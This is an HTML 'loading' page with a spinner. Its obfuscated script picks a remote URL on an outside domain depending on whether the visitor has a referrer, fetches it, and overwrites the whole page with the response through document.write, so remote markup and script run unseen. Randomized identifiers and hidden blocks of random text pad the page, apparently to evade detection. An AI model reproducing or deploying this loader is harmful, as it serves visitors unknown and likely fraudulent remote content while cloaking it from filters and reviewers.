<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .yRZlwZBp6 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .yRZlwZBp6 .WkdQq0Xstw {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .yRZlwZBp6 .content {
            line-height: 50px;
            text-align: center
        }

        .yRZlwZBp6 .img {
            width: 100%
        }

        .yRZlwZBp6 .SGq4H1vYJRG {
            text-align: center
        }

        .yRZlwZBp6 .SGq4H1vYJRG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .yRZlwZBp6 .SGq4H1vYJRG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .yRZlwZBp6 .SGq4H1vYJRG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .yRZlwZBp6 .SGq4H1vYJRG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .yRZlwZBp6 .SGq4H1vYJRG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .yRZlwZBp6 .SGq4H1vYJRG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .yRZlwZBp6 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function VvbsT2TxkKTU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dZrFRm9 = VvbsT2TxkKTU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dZrFRm9 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dZrFRm9 +".html?a=share";
		}
		
        vLly61SeLO=url+"#"+new Date().getTime();
        vLly61SeLO && function() {
            $.get(vLly61SeLO, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>ck7FpA4w2TPPUtMo7nGJR3ZOGyqZRFND3</a>
<div style='display:none'>TVFIdW4XXpBFAo4fiGbE7IDODpbV8XeLF7jUbejkJuadhatFMWftW0J</div>
<a  href='#' style='display:none'>ck7FpA4w2TPPUtMo7nGJR3ZOGyqZRFND3</a>
<p  style='display:none'>t8vvaAENlCGUlb52BcHirLf4w9ICacVc</p>
<li style='display:none' >XsIlDO5YYO06bUblfPzuTWPrWNEc1xjIG4UPzxE0junsnoZ4pJt5WPjd1gw2ni2O9XSIHyfuQc5gyNDUG3rTrpD</li>
<ul style='display:none' >xD142M3Jh7qWY8bylTGBFY7g9jUfjt20BeGnd7Objq6Cuv7I5H5fAOOlIFA8clnggxqOFs3sYhQzEpaTeKI</ul><div class="yRZlwZBp6">
    <div class="WkdQq0Xstw">
        <div class="SGq4H1vYJRG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>AoRJVIooad1V05fIL2QBO5j</div>
<a  href='#' style='display:none'>SGEehBlpcvrXf0gKH9dCgv3F70e4kyKaIHwkpAlHoQcifSScl4fPEU9g7CZ</a>
<li style='display:none' >CO8zi31bTP4JegBEv03Mh5bB3uOH7UA3eBoImSagTPpyKCGp8pYWpz9I5VhUAuRhuk8bpj2BsLfs7JKHspn</li>
<span style='display:none'>c5lboLzWc0Ta93ytQWo6fa2fQCsHpEXtDfR1TSBdBKZq</span></body>
</html>